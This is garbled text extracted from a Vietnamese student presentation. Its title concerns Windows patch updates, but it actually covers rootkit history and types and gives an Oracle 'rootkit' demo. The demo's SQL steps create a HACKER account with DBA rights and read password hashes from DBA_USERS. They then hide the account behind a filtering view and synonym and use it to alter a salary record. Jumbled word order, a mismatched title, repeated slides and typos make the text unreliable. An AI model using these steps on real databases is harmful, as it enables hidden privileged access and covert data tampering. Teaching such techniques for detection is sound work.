1 HỌC VIỆN KỸ THUẬT MẬT MÃ Tìm hiểu, triển khai công nghệ tự động cập nhật vá cho máy trạm máy chủ chạy hệ điều hành Microsoft Windows Giáo viên hướng dẫn: TS Cao Minh Tuấn Nhóm sinh viên thực hiện: Nguyễn Văn Minh Hoàng Phạm Thị Thương Mến Thiều Thùy Trang Nữ Trần Võ Anh Thư NỘI DUNG TỔNG QUAN VỀ ROOTKIT TẤN CÔNG ROOTKIT TRONG ORACLE PHÁT HIỆN VÀ PHÒNG TRÁNH ROOTKIT Tổng quan RootKit PRESENTED BY MEMBER OF GROUP LỊCH SỬ ROOTKIT TỔNG QUAN VỀ ROOTKIT Eweek CÓ 20% malware bị phát Windows XP Window SP2 rootkit R côn khai Window Geg Hoglund Dangerous Dùng để công cụ Unix Thuật ngữ biên dịch lại “ps”, Root- mức truy nhập cao “netstat”, “ω” có thê che giấu vào hệ thống có vết tích kẻ xâm nhập qun admin , Kit- tập Sony Rootkit Tỉ lệ Rootkit malware Rootkit ngày biến hóa Rootkit xuất phổ biến với nhiều loại Rootkit khác giới công nghệ ngày nay, ẩn tàng 16%, kiện Sony Rootkit mailware tới người dùng 8% công cụ che giấu chiếm quyền 1999 At the beginning … 6/12/2005 6/12/2006 … 2018 Sự kiện Sony Rootkit: Hãng ghi âm Sony BMG phải nộp khoản tiền lên tới 1,5 triệu USD để đền bù cho người dùng PC hai bang California Texas cố tình cài phần mềm chống vi phạm quyền Một số Rootkit có như: Sâu Stuxnet, Koutodoor, TDSS dạng Rootkit đĩa CD hãng GIỚI THIỆU VỀ ROOTKIT TỔNG QUAN VỀ ROOTKIT chương trình thiết kế để Rootkit độc hại thường dùng cho việc xâm che giấu không mà cịn nhập trì điều khiển từ xa cách thành phần liên quan khác bất hợp pháp, che giấu malware, process, file malwware cài đặt backdoor cho phép hacker truy nhập tới máy bị điều khiển ROOTKIT Khơng mang tính hiểm độc Rootkit cho thấy lỗ hổng hệ điều tiềm ẩn nguy an tồn sử hành Khó mà biết tính tồn vẹn hệ dụng với chương trình VISRUS, thống tới đâu SÂU, TROJAN CÁCH THỨC HOẠT ĐỘNG CỦA ROOTKIT TỔNG QUAN VỀ ROOTKIT Chiếm quyền điều khiển Kỹ thuật Hooking Bất kì user hay chương trình truy Hooking Rootkit sử dụng để thay đổi đường vấn hệ thống, kết trả mặc định tin tưởng không chút nghi vấn Rootkit lợi dụng tin tưởng Đầu tiên phải chiếm quyền quản trị hệ thống để điều khiển hệ thống làm cho Control dẫn thực thi hệ điều hành PHÂN LOẠI ROOTKIT TỔNG QUAN VỀ ROOTKIT Rootkit Rootkit bền bỉ ( Persistent) User mode Rootkits Là loại rootkit kết hợp với mã Có nhiều PP lẩn trốn, chặn hàm gọi API ( độc khác hoạt động hệ thống giao tiếp lt ứng dụng) khởi động Rootkit dựa nhớ( Memorybased) Là mã độc khơng có đoạn mã "dai Kernel mode Rootkits dẳng"  - lưu nhớ, Nguy hiểm hơn, chặn API, thao tác cấu trúc loại rootkit không tồn sau khởi liệu hệ thống động lại máy Tấn công rootkit oracle PRESENTED BY MEMBER OF GROUP TẤN CÔNG ROOTKIT TRONG ORACLE Content Kiến trúc Quản trị Tấn công Oracle Oracle Rootkit QUẢN TRỊ ORACLE 10 TẤN CÔNG ROOTKIT TRONG ORACLE 2-Tài khoản SYS 1-Đặc quyền Oracle Image Here Là quyền thực thao tác định sở hồi(Revoke) người dùng Là tài khoản sở hữu sở liệu từ điển liệu được tạo tự động gán role DBA Mật mặc định change_on_install Không nên tạo table hay chỉnh sửa schema user ( ĐQ Đối tượng hệ thống) SYS Image Here liệu Đặc quyền gán(Grant),cũng thu 4-PL/SQL(ngơn ngữ truy vấn cấu trúc) 3-Tài khoản System Image Here Được tạo tạo sở liệu , gán role DBA User system thường sở hữu bảng Oracle cung cấp Image Here SQL- Dùng để truy nhập để lấy liệu từ sở liệu SQL khơng có đảm bảo tính hiệu quả, khơng có vịng User system tạo thêm table view để cung lặp,… cấp thông tin quản trị PL/SQL khắc phục nhược điểm SQL có thêm Khơng nên tạo đối tượng tài khoản tính PL/SQL sử dụng cho việc tạo procedure, function, trigger, object lưu trữ Oracle 20 Nội dung Demo: Bước 1: Chiếm quyền Root Bước 2: Gán quyền Bước 3: Thực thi chương trình, che dấu thay đổi đường đẫn thực thi, xóa dấu vết ( Trong demo giả sử Hacker chiếm quyền Root) 21 NGUYỄN VĂN MINH HOÀNG AT121014 TRẦN VÕ ANH THƯ AT121049 PHẠM THỊ THƯƠNG MẾN MEMBER OF GROUP THIỀU THÙY TRANG NỮ AT121035 AT121026 22 THANKS FOR LISTENING PRESENTED BY MEMBER OF GROUP 23 Bước 1: Bật sql/plus: Bước 2:Đăng nhập vào hệ thống tài khoản SYSTEM với tư cách tin tặc :user-name:SYSTEM,password: Enter username: SYSTEM Enter password: Enter password: ABC123 24 Bước 3: Tạo user HACKER mật ABC123 SQL>CREATE USER HACKER IDENTIFIED BY ABC12 25 Bước 4: Gán quyền DBA cho user HACKER: SQL>GRANT DBA TO HACKER Bước 5: Đăng nhập với người dùng vừa tạo : 26 SQL>CONNECT Enter username: HACKER Enter password: ABC123 27 Bước 6: Truy vấn đến bảng hệ thống DBA_USER: SQL> SELECT USERNAME, PASSWORD FROM DBA_USERS 28 Bước 7: Đăng nhập với quyền cao người dùng HACKER SQL> CONNECT AS SYSDBA Enter username: HACKER Enter password: ABC123 Bước 8: Tạo view tên DBA_HACK1 để đánh lừa người dùng nhằm ẩn user HACKER: SQL>CREATE VIEW DBA_HACK1 AS SELECT * FROM DBA_USERS WHERE USERNAME!= ‘HACKER’ Bước 9: Tạo synonym có tên HACKER.DBA_USERS SQL> CREATE SYSNONYM HACKER.DBA_USERS FOR DBA_HACK1 29 Bước 10: Đăng nhập lại user: Enter username: HACKER Enter password: ABC123 Bước 11: Truy vấn tên người dùng bảng DBA_USER : SQL> SELECT USERNAME FROM DBA_USERS 30 Bước 12: Đăng nhập user System tạo bảng Nhân Viên: Enter username: SYSTEM Enter password: CREATE TABLE NHANVIEN( MANV NVARCHAR(5) NOT NULL PRIMARY KEY, HOTEN NVARCHAR(30), PHONG NVARCHAR(10), LUONG NUMBER ) 31 32 Bước 13: Tạo ghi cho bảng NhânViên: INSERT INTO NHANVIEN VALUES ( ‘001’, ‘ Pham Van A’, ‘Phong 3’, ‘3000000’); Bước 14: Truy vấn liệu bảng Nhân Viên: 33 SELECT * FROM NHANVIEN Bước 15: Đăng nhập user Hacker sửa nội dung bảng CONNECT HACKER/ABC123 UPDATE SYSTEM.NHANVIEN SET LUONG=‘5000000’ WHERE MANV=‘001’; SELECT * FROM SYSTEM.NHANVIEN ; 34 select username, password from dba_users ; alter user oravn identified by oravn ; ...NỘI DUNG TỔNG QUAN VỀ ROOTKIT TẤN CÔNG ROOTKIT TRONG ORACLE PHÁT HIỆN VÀ PHÒNG TRÁNH ROOTKIT Tổng quan RootKit PRESENTED BY MEMBER OF GROUP LỊCH SỬ ROOTKIT TỔNG QUAN VỀ ROOTKIT Eweek CÓ 20% malware... admin , Kit- tập Sony Rootkit Tỉ lệ Rootkit malware Rootkit ngày biến hóa Rootkit xuất phổ biến với nhiều loại Rootkit khác giới công nghệ ngày nay, ẩn tàng 16%, kiện Sony Rootkit mailware tới... vấn Rootkit lợi dụng tin tưởng Đầu tiên phải chiếm quyền quản trị hệ thống để điều khiển hệ thống làm cho Control dẫn thực thi hệ điều hành PHÂN LOẠI ROOTKIT TỔNG QUAN VỀ ROOTKIT Rootkit Rootkit